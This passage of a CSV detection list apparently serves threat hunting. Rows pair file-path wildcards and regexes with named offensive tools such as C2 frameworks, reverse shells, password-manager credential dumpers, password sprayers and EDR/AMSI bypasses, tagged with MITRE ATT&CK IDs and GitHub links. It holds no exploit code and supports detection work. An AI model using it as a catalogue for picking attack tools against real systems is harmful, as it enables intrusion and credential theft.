- TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NtoskrnlOffsets.csv*",".{0,1000}\\NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*\NtRemoteLoad.exe*",".{0,1000}\\NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\NtRemoteLoad.sln*",".{0,1000}\\NtRemoteLoad\.sln.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\NtRights\*",".{0,1000}\\NtRights\\.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\Nuages_Cli*",".{0,1000}\\Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*\nxc.exe*",".{0,1000}\\nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nxc\parsers\ip.py*",".{0,1000}\\nxc\\parsers\\ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nxc\parsers\nmap.py*",".{0,1000}\\nxc\\parsers\\nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Obfuscar.Console.exe*",".{0,1000}\\Obfuscar\.Console\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" 
"*\Obfuscated-Code.py*",".{0,1000}\\Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*\obfuscation.exe --help*",".{0,1000}\\obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\obfy-1.0.zip*",".{0,1000}\\obfy\-1\.0\.zip.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","7","609","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" "*\oem\Desktop\backdoor*",".{0,1000}\\oem\\Desktop\\backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\OffensiveCpp\",".{0,1000}\\OffensiveCpp\\","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" 
"*\OffensiveCpp-main*",".{0,1000}\\OffensiveCpp\-main.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\OffensiveCSharp\*",".{0,1000}\\OffensiveCSharp\\.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\Offensive-Netsh-Helper\*",".{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\Offensive-Netsh-Helper-master*",".{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\OfficePersistence.ps1*",".{0,1000}\\OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" 
"*\OfflineKeyloggerPipe*",".{0,1000}\\OfflineKeyloggerPipe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","named pipe","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\oh365userfinder.py*",".{0,1000}\\oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\onesixtyone.py*",".{0,1000}\\onesixtyone\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\online_brute.gz*",".{0,1000}\\online_brute\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*\oracle-patator.py*",".{0,1000}\\oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\oracle-scanner.py*",".{0,1000}\\oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\oracle-tnscmd.py*",".{0,1000}\\oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\os\windows\pkg\evasion\evasion*",".{0,1000}\\os\\windows\\pkg\\evasion\\evasion.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\oSpray.py*",".{0,1000}\\oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*\ouned_smbserver.py*",".{0,1000}\\ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through 
gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\out_pe.exe*",".{0,1000}\\out_pe\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*\OutFileCommand.cs",".{0,1000}\\OutFileCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Outflank-Recon-AD\*",".{0,1000}\\Outflank\-Recon\-AD\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - 
T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\owa-valid-users.txt*",".{0,1000}\\owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\padre\pkg\exploit*",".{0,1000}\\padre\\pkg\\exploit.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*\pamspy.bpf.c*",".{0,1000}\\pamspy\.bpf\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\pamspy_event.h*",".{0,1000}\\pamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials 
Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\pandora.cpp*",".{0,1000}\\pandora\.cpp.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\pandora.sln*",".{0,1000}\\pandora\.sln.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\papacat.zip*",".{0,1000}\\papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*\Parasite Invoke.csproj*",".{0,1000}\\Parasite\sInvoke\.csproj.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.exe*",".{0,1000}\\Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.pdb*",".{0,1000}\\Parasite\sInvoke\.pdb.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.sln*",".{0,1000}\\Parasite\sInvoke\.sln.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke\*",".{0,1000}\\Parasite\sInvoke\\.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite-Invoke-main*",".{0,1000}\\Parasite\-Invoke\-main.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\ParsedMalleableData.txt*",".{0,1000}\\ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\parsers\nessus.py*",".{0,1000}\\parsers\\nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PassTheCert.cs*",".{0,1000}\\PassTheCert\.cs.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a 
certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\PassTheCert.sln*",".{0,1000}\\PassTheCert\.sln.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*\PassTheChallenge\PassTheChallenge\*",".{0,1000}\\PassTheChallenge\\PassTheChallenge\\.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*\passwarden\app\getCredspasswarden.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials 
and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\passwarden\app\getCredspasswarden2.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\password.lst*",".{0,1000}\\password\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\passwordboss\app\getCredspasswordbossapp1.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\passwordboss\app\getCredspasswordbossapp2.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" 
"*\Passwordfiles.txt*",".{0,1000}\\Passwordfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Passwords.docx*",".{0,1000}\\Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\patch_amsi.exe*",".{0,1000}\\patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\patch_etw.exe*",".{0,1000}\\patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\PatchingAPI.exe*",".{0,1000}\\PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\path_traversal_dict.txt*",".{0,1000}\\path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" 